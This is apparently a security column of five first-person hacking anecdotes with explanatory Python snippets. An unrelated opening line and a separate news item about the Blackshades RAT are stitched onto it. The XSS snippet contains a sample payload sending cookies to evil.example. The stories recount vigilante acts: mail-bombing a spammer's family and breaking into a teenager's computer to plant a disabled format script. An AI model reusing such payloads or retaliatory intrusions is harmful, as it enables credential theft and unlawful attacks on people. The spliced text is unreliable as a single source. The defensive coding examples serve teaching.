In the end, if you have diabetes and someone invents something to help you out, then you might not care whether it is Microsoft or Google in your eye.

True tales of (mostly) white-hat hacking
Stings, penetration pwns, spy games — it’s all in a day’s work along the thin gray line of IT security

In the mainstream media, hacking gets a bum rap. Sure, the headline grabbers are often nefarious, but all computer professionals are hackers at heart. We all explore the systems we use, often reaching beyond their normal intent. This knowledge and freedom can come through big time in sticky situations.

In my three decades fighting malicious hackers, I’ve come to rely heavily on that desire to scratch an itch. Improvisation and familiarity with computing systems are essential when combating those who will do almost anything to compromise your network.

Some call it white-hat hacking. I call it a good day’s work — or weekend fun, depending on whether it’s at home or business.

Here are five true tales of bringing down the baddies. I can’t say I’m proud of all the things I did, but the stories speak for themselves. Got one of your own to pass along? Send it my way, or share it in the comments.

True tale of (mostly) white-hat hacking No. 1: Disney, porn, and XSS
Cross-site scripting (XSS) continues to be the No. 1 problem plaguing websites, even today. XSS vulnerabilities arise when a website allows another entity to post Web scripting commands that can then be viewed and executed by others.

Oftentimes, these vulnerabilities fly under the radar. Simply offering users the ability to post comments is enough, if your site allows script commands to be posted, viewed, and executed. A malicious party writes a malicious scripting command that is then consumed and acted upon by other visitors to your site.
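To make the risk concrete, here is a minimal Python sketch — with a hypothetical comment and attacker domain — showing why a site must escape user-posted content before rendering it:

```python
import html

# A hypothetical comment posted by a malicious visitor.
comment = '<script>document.location="http://evil.example/?c="+document.cookie</script>'

# Rendering the comment verbatim hands the attacker's script to every viewer.
unsafe_page = "<div class='comment'>" + comment + "</div>"

# Escaping HTML metacharacters turns the same payload into inert text.
safe_page = "<div class='comment'>" + html.escape(comment) + "</div>"

print("<script>" in unsafe_page)  # True: a browser would execute the script
print("<script>" in safe_page)    # False: it renders as &lt;script&gt;
```

Real sites need context-aware encoding (HTML body, attributes, JavaScript, URLs each differ), but the principle is the same: never echo untrusted input verbatim.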

When asked why you should worry about cross-site scripting attacks, I like to tell the following story, although the XSS scripting part was just one piece of a great week of hacking.

I was working at a well-known computer security company at the time, and we had been hired to perform penetration testing on an IP TV device that a large cable company was considering producing. Our mission was to find vulnerabilities in the set-top box, especially if any of those vulnerabilities could lead to stealing porn for free, posting porn to, say, the Disney channel, or leaking private customer or company information.

Two coworkers and I were set up in a computer room within one of the cable company’s remote offices. Our attack targets consisted of two televisions, two cable modems, and two new set-top cable boxes (the intended testing target). We were connected to a cable TV broadband connection in such a way that no one else would know the difference between our setup and any normal customer. We then played porn on one TV and Disney movies on the other.

Three guys sitting in a room, hacking away, watching porn, and getting paid to do it — life was good. The only thing missing was the beer. In short order, using a port scanner, I had found a Web server running on a high TCP port, in the neighborhood of 5390. I ran Nikto, a Web vulnerability finder, and it came up with a few false positives. But it also identified the Web server as something I had never heard of. A little research told me it was an open source Web server that had stopped being supported nearly a decade before.
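Finding that web server took nothing more exotic than a TCP connect scan. A rough sketch of the idea in Python, scanning a hypothetical host across a band of high ports:

```python
import socket

def scan_ports(host: str, ports: range, timeout: float = 0.5) -> list:
    """Return the ports on `host` that accept a TCP connection."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            # connect_ex returns 0 on success instead of raising an exception.
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports

# Probe localhost for anything listening near the band where the
# set-top box's web server turned up (ports here are illustrative).
print(scan_ports("127.0.0.1", range(5380, 5400)))
```

Purpose-built tools such as Nmap do this faster and more stealthily, but a connect scan like the above is all it takes to find a forgotten service.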

I wondered how likely it was that an old Web server was patched against vulnerabilities that were common 10 years ago. My hunch was correct. I was able to access the set-top box using a simple directory traversal attack (such as http://..//..//..//). I was in as root and had complete control of the device. It was running an old flavor of BSD, which was full of vulnerabilities by itself. In short order, we were able to steal porn, steal credit card numbers, and switch the Disney channel out with porn. We had accomplished all our goals, only a few hours in.
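The traversal worked because the server joined the requested path onto its document root without collapsing the ".." segments. A sketch of the check the server should have performed — the web root and paths here are illustrative:

```python
from pathlib import PurePosixPath
from typing import Optional

WEB_ROOT = PurePosixPath("/var/www/html")

def resolve_request(url_path: str) -> Optional[PurePosixPath]:
    """Map a requested URL path to a file, rejecting traversal attempts."""
    parts = []
    for seg in url_path.split("/"):
        if seg in ("", "."):
            continue          # ignore empty and current-directory segments
        if seg == "..":
            if parts:
                parts.pop()   # ".." inside the tree is harmless
            else:
                return None   # attempt to climb above the web root
        else:
            parts.append(seg)
    return WEB_ROOT.joinpath(*parts)

print(resolve_request("/index.html"))          # /var/www/html/index.html
print(resolve_request("/..//..//etc/passwd"))  # None: traversal rejected
```

Production servers typically also resolve symlinks and verify the final real path is still under the root; this sketch shows only the path-normalization half of that defense.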

Later that week I learned that my success with a directory traversal attack would find its way up to the cable company’s CSO and beyond. I was invited to talk about my finding ahead of the official written report. Many of the company’s bigwigs flew in for the meeting. When I asked why all the hullabaloo for something they could fix in the new set-top box, I learned that the same Web server and setup was being used in millions of existing cable boxes around the world. I did a scan of the Internet looking for the high TCP port and found tens of thousands of them awaiting anyone’s connection and hacking attempt.

That wasn’t even the highlight — at least to our penetration-testing team. While attacking the set-top box, we found it contained an HTML firewall log, which had an XSS vulnerability. The log would record all Web packet content details after we raised its debug level. Then we crafted an attack packet containing malicious JavaScript and called the cable company’s tech support number.

Posing as a regular customer, we complained that we thought someone was attacking our cable box and asked if the technician could take a look at our device’s firewall log to confirm. A few minutes later up popped the technician’s shadow and passwd password files. When executed, our encoded malicious JavaScript packet would look for various password and configuration files and, if found, send them back to us. The technician had viewed the firewall log, the XSS had launched, and we ended up with the company’s enterprise-wide root password. All of this hacking occurred in about six hours. In less than a day we had fatally compromised the set-top box and pwned the whole company.

And that’s to say nothing of the hardware mods and component fires we caused during the ensuing days of boredom, when we had nothing left to do but wait for our scheduled plane rides home.

It was pure joy — and one of the most fun hacking days in my life.

True tale of (mostly) white-hat hacking No. 2: Spamming the persistent porn spammer
Some white-hat hacking walks a thin line. Here’s a great example of “white-hat hacking” of a vigilante nature gone somewhat awry.

Back in the late 1980s, when I was using an email client called Lotus cc:Mail, my work email address had found its way to a porn spammer, and he began to load my inbox with enticements. After five of them came through in a couple of minutes, I decided to take a look at the email header. Back then, spammers didn’t hide as much, and the header revealed the spammer’s true domain name. Using a reverse lookup, I found the hacker’s name, address, and work email address from his domain’s DNS registrar.

I sent a polite email asking to be removed from the spammer’s email list. He replied that there was nothing he could do and followed up with 10 more porn spams. This ticked me off, so I created a mailbox rule to fire back 100 copies of any porn spam message he sent my way. Naturally, this only incited him to send even more spam, along with a personal email indicating that he was sharing my email address with other spammers.

I used the search engine we all envied at the time, AltaVista, and found not only his personal email account, but those of his wife, daughter, and grandparents. I sent him an email notifying him that every time I received any new spam I would send 100 copies of that spam to his personal email account, as well as those of his wife, his daughter, and his grandparents. Not surprisingly, the new spam suddenly stopped. I even got an email from him notifying me that it might take a day for all spam to stop because he had to remove my name from external lists beyond his control. I never got another spam from him.

I contacted the late, great Ed Foster’s Gripeline column at InfoWorld (many years before I began writing for InfoWorld myself) and told him what I did and how I had found a new way to stop spam that anyone could use. I expected him to congratulate me and make me the focus of one of his columns. Instead, he told me that what I did, or proposed to do, including using the daughter’s email address in my threat, bordered on illegal territory, and at the very least raised ethical issues. Bless Ed Foster for making me realize I was walking a line I might not want to tread.

True tale of (mostly) white-hat hacking No. 3: Red-herring sting nabs nefarious fishmonger
Years ago I was hired by the CEO of a small fish-selling business. He had a hunch that a former senior executive had hacked his company to get a competitive edge in fish sales to Egypt. A new company, started by the former VP, was suddenly and consistently beating his bid proposals by 1 cent per pound — just enough to ensure that my client’s company went from getting every fish delivery project to getting none. The fishmonger was near bankruptcy when he hired me.

I was a little skeptical of his allegations of computer hacking during our initial visit, but while I was there something odd happened. An Egyptian contact, to whom the CEO had sent bid responses, received an automatic notice of an email being opened (a read receipt) from an unknown email account in response to an email he had sent my client. The read receipt should have originated from the CEO’s email account, but instead it came from a university email account. It appeared, and was later confirmed, that the hacker had forgotten to turn off automated read receipts in his email client; when he opened email intended for the CEO, his client sent back a read receipt from his own account.

We quickly figured out that the former VP had discovered the CEO’s email password and was using it to pick up copies of bid information between his former company and Egypt. The newly discovered email address linked back to a nearby university, which, coincidentally, both the former VP and I had attended years ago. The school allowed former students to continue to use limited parts of its computer system, including email. Antiquated by today’s standards, the university’s system had a few interesting features that proved useful in our investigation: You could look up when other people were using the system, and it would let you link email addresses to real names, along with other identifying information.

We contacted the FBI and city police to report the cyber crime. At the time, the FBI had very few computer crime experts, none with real hacking skills. But with their legal assistance, I was allowed to perform, under the FBI’s legal authority, some limited forensic investigative techniques.

Sure enough, the hacker was using a university email account that we could trace to the former VP. Using various lookups, we were able to see when the former employee used the university system. The correlation to days when fish bidding was performed was striking.

Of course, we could not conclusively confirm that the former VP was using his old email account, no matter how obvious it seemed. We needed a way to track an opened email back to the former VP’s current IP address, which could then be subpoenaed from his ISP. I decided to use a Web beacon.

A Web beacon (aka a Web bug) is a hidden HTML link to a nearly invisible graphic element that when viewed in an HTML-enabled client allows the custodian of that element to track information about the user who has opened it. I modified the CEO’s email signature to contain an HTML link to a 1-pixel transparent GIF file located on a Web server that we managed. When anyone opened an email containing the CEO’s modified signature, their email client would automatically download the Web beacon, and our Web server logs would contain the viewer’s current IP address, along with time, date, and other identifying information.
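A sketch of the mechanics, using a hypothetical tracker domain and a representative access-log line:

```python
# The beacon embedded in the CEO's email signature: a 1x1 transparent GIF
# hosted on a server we control. (Domain and filename are hypothetical.)
beacon_html = (
    '<img src="http://tracker.example/sig.gif" width="1" height="1" alt="" />'
)

# When an HTML-enabled mail client renders the message, it fetches the GIF,
# and the web server logs the request -- exposing the reader's IP address
# and the moment the message was opened.
log_line = '203.0.113.42 - - [12/Mar/2004:09:15:01 -0500] "GET /sig.gif HTTP/1.1" 200 43'

ip, rest = log_line.split(" ", 1)
timestamp = rest.split("[", 1)[1].split("]", 1)[0]
print(ip)         # 203.0.113.42
print(timestamp)  # 12/Mar/2004:09:15:01 -0500
```

That logged IP address is exactly the artifact that can then be subpoenaed from an ISP and tied to a subscriber. (This is also why most modern mail clients block remote images by default.)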

With our trap in place, we set up a sting. We contacted our Egyptian friend via phone to notify him of our plans. We sent an email discussing a nonexistent bid, along with our Web beacon. Further, we made a bid price that was several orders of magnitude higher than either party normally negotiated and used a fish type that did not exist. Everything about this email screamed fake, if you took the time to research it.

Immediately after we sent the email, the former VP took the bait, sending a bid to our Egyptian exactly 1 cent lower than our extremely high price. I was also able to produce evidence that the former VP accessed the university email system just prior to his response to the fake bid, and our Web beacon worked as planned. We had his IP address, which tracked him to his home. We knew it was his company; we knew it was him; we knew he had been illegally reading emails.

It was an open-and-shut case, although it took years to wind its way through multiple court hearings. Years after the hacking event, I learned that the CEO never changed his email password, proving once again that I understand computers way better than humans.

True tale of (mostly) white-hat hacking No. 4: Hacking comeuppance
I’ve been actively fighting malicious hackers for three decades and have been hacked only twice — once, because I knowingly ran an early computer virus on my system but had forgotten to set up a safe “jail” before executing it.

The second time, a hacker had sent malicious emails to my InfoWorld address in an attempt to take over my computer. I usually investigate these infrequent occurrences if only to see whether the attack is unique or unusual. In this particular case, the hacker had sent me a GIF file, which took advantage of a brand-new zero-day exploit that buffer-overflowed a Microsoft Windows graphics handling file and gave the attacker full control of my system.

I was getting ready to head out on vacation after a few hours of sleep, and was in such a hurry that I didn’t take the time to open the email in a virtual environment, as I normally would with an email I knew to be malicious. I also couldn’t believe that the attached GIF file could buffer-overflow my system. Many hackers had claimed the ability to do this for nearly two decades, but until that email, it had never been accomplished in the wild. I was overly confident, perhaps a little cocky, that this malicious graphics file would be like the rest — harmless.

I was wrong. Immediately upon executing it, I could see it implant a backdoor Trojan and dial home. It took me by surprise. After hitting myself in the head a few times for executing a known malicious file on my personal computer, I disconnected from the Internet and immediately began defanging the newly dropped Trojan.

Within a few hours, I had successfully tracked and documented the new vulnerability. I sent a copy off to Microsoft and a few of my antivirus friends for more analysis and response. I lost any chance of getting any sleep before my vacation, and I remember driving way more tired than I should have.

The incident didn’t end there. I contacted the originator of the email and gave him some ill-deserved props. I had noticed he was bragging about his exploit on an IRC hacker channel and spreading his creation to dozens of websites. I told him that Microsoft was working on a fix and all the AV companies were releasing signatures. Needless to say, he wasn’t happy.

He then tried to hack my personal computer network, having acquired the IP address from his initial backdoor Trojan. He launched every malicious attack anyone could think of at the time, including DDoS attacks. When he couldn’t break into my network, he began attacking people and companies I did business with, using my IP address. For example, the hacker was successful in getting Apple to ban my IP address from connecting to its networks, preventing me from picking up new music from iTunes. No amount of emails with Apple would fix the problem, and eventually I was forced to get another IP address from my ISP.

I investigated the hacker, reading emails he had posted in a few hacker forums and on legitimate websites. What I found was that he was an overly zealous high school kid in the Midwest who thought he was a better hacker than he really was. Even “his” zero day was created by someone else. He just passed it along and claimed credit.

After a few more weeks of computer attacks, I sent him an email asking him to stop. He was surprised I had his email address. I responded with his real name, high school, and mailing address. I politely asked that he stop hacking me. He responded by launching even more attacks and attacking more companies using my new IP address. He was getting annoying. It was time to turn the tables.

I figured out which firewall he used to protect himself and remembered that a remote buffer overflow in it had recently been announced in a public forum. This next step probably wasn’t legal, but I used the buffer overflow to break into his computer. I created a batch file with commands that would format his hard drive the next time he rebooted, except I remarked out (REM’d) the lines so they would not take effect. I then sent him an email and told him of this “kill” batch file that I had placed on his local hard drive.

He was stunned. I told him that there were lots of smart hackers in this world and he wasn’t the only one who knew how to get onto other people’s systems. I then politely asked that he stop attacking not only my system, but anyone’s system, and turn his curiosity to legal ends. He agreed. As far as I know, he never did any illegal hacking again.

Afterward, I got emails and IM chat messages from him for years. He went to college, got an engineering degree, and eventually became a midlevel executive at a computer company that got swallowed up by a huge conglomerate. He became fairly rich in the process. He has a wife and a few kids now. I don’t know if anyone in his life knows about his teenage hacking years. I can only tell you that it appears one good scare helped turn his life around.

True tale of (mostly) white-hat hacking No. 5: Like spies to a honeypot
I had been hired to help implement honeypots. The client, a defense contractor and think tank, had been thoroughly compromised and wanted an early-warning system to detect malicious hackers or insiders and to catch any unknown malware roaming around its network.

Over the next few weeks we created a “honeynet” of early-warning systems, fake Web servers, SQL servers, and SharePoint servers. During any honeypot project, I’m often asked how we’ll attract attackers to the honeypots. I always respond that there is no need to advertise; the attackers will find them. This statement is always met with skepticism, but it’s held true over the years.

We fired up the honeypots, and sure enough, we immediately discovered malware that had not previously been detected. Better yet, within 24 hours we discovered that an internal employee was also roving around the network and hacking various systems. She was trying to break into the new fake servers, including the Web, SQL, and SharePoint servers.

We weren’t sure what type of content the overly zealous employee was looking for or what her intent was, so we created a few different content areas. One dealt with a popular game, which half the users on the IT team seemed interested in. They were going so far as to hack into underutilized servers to host games and use resources. We also created sites centered on Middle East politics (the think tank’s focus) and the space shuttle. We downloaded the content from publicly available websites, copied it to folders, directories, and databases that made it appear as if the information was top secret, and used wget to keep the information updated.

The internal intruder went for the serious stuff. She wasn’t interested in gaming. We tracked her to an accounting/payroll department — by coincidence, literally on the other side of the wall from our honeynet team. The accounting department already had a Web camera in the room for payroll security issues.

With it, we watched the employee, a Russian temp, hack several real systems over the remaining week. Examining her computer after she left for the day, we found that she had inserted a wireless network card and had successfully bridged the “air-gapped” secure and nonsecure network. We could tell she was transmitting the data from her computer to someone else hooked into the wireless network. We placed keylogging programs on her computer to record her every keystroke.

We purchased a wireless sniffer to better track the hacker, and when she began transmitting information, we roamed the hallways looking for the illicit partner. We ended up in a nearby conference room that was open to the public. We opened the doors and saw about 200 people, half of them carrying laptops. Try as we might, we could not track the illegal data stream to a particular person. We had a room and a MAC address. Senior leadership would not allow us to stop everyone in the room to locate the specific person. Although I didn’t like the decision, it probably was the best legal answer.

It was decided that we would detain the known perpetrator to stop the data loss. I hung out in the background as IT and physical security confronted the employee. The moment the security guards entered the accounting department, the temp pushed away from her PC and claimed that someone was hacking it. She was so adamant and tearful that if I had not watched her expert hacking over the past few days using the Web camera, I would have believed her. She was a wonderful actress.

I never heard whether she was arrested or deported or what happened to her. I was not privy to those details. But I did hear that she was just one employee from a newly engaged temporary placement agency, and all the other employees from the agency were also caught hacking at this same client. The young woman I had helped detain had claimed that she had so few computer skills that the company had sent her to basic keyboarding classes.

It remains the one time in my life where I helped catch a Russian spy.


The security vendor has seen an uptick in infections as well as command-and-control servers

Cybercriminals are increasingly using the “Blackshades” malware program whose source code was leaked three years ago, according to an analysis by Symantec.

Blackshades, which Symantec identifies as “W32.Shadesrat,” has been infecting more Microsoft Windows computers and is being controlled by hundreds of command-and-control servers worldwide, which deliver instructions and receive information, wrote Santiago Cortes, a security response engineer at Symantec, in a blog post.

Blackshades is a remote access tool (RAT) that collects usernames and passwords for email and Web services, instant messaging applications, FTP clients and more. It has been sold on underground forums since at least 2010.

It’s common for hackers to use remote access tools, which can be used to upload other malware to a computer or manipulate files. To avoid antivirus software, the programs are often frequently modified.
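The point about frequent modification is easy to illustrate: detection keyed to exact bytes breaks as soon as a single byte changes. A Python sketch (the byte strings are stand-ins, not real malware):

```python
import hashlib

# Stand-in bytes for a malware binary; not a real sample.
original = b"MZ...payload bytes..."
# A trivial "repack": the same program with one appended byte.
repacked = original + b"\x00"

h1 = hashlib.sha256(original).hexdigest()
h2 = hashlib.sha256(repacked).hexdigest()
print(h1 == h2)  # False: an exact-hash signature no longer matches
```

This is why AV vendors supplement hash and byte-pattern signatures with heuristics and behavioral detection, and why RAT sellers ship frequent repacked builds.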

Lithuania and the U.S. have the highest number of command-and-control servers, Cortes wrote. Nearly all of those servers at one point have hosted exploit kits, a kind of booby trap that delivers malware to computers with software vulnerabilities.

India, the U.S. and the U.K. have the most computers infected with Blackshades, Cortes wrote.

“The distribution of the threats suggests that the attackers attempted to infect as many computers as possible,” Cortes wrote. “The attackers do not seem to have targeted specific people or companies.”

Earlier this year, Symantec wrote that a license to use Blackshades costs between US$40 and $100 a year.

Last year, Symantec wrote that Blackshades had been promoted on underground forums by a person going by the nickname “xVisceral.”

In June 2012, the U.S. Attorney’s Office for the Southern District of New York announced the arrest of Michael Hogue in Tucson, Arizona. It alleged he went by the xVisceral nickname and sold RATs. Hogue was arrested with 23 others in a “carding” scheme, which involved trafficking in financial details.

Hogue entered a plea in the case in January, but it did not appear from the court file that he had been sentenced yet. He was charged with conspiracy to commit computer hacking and distribution of malware.
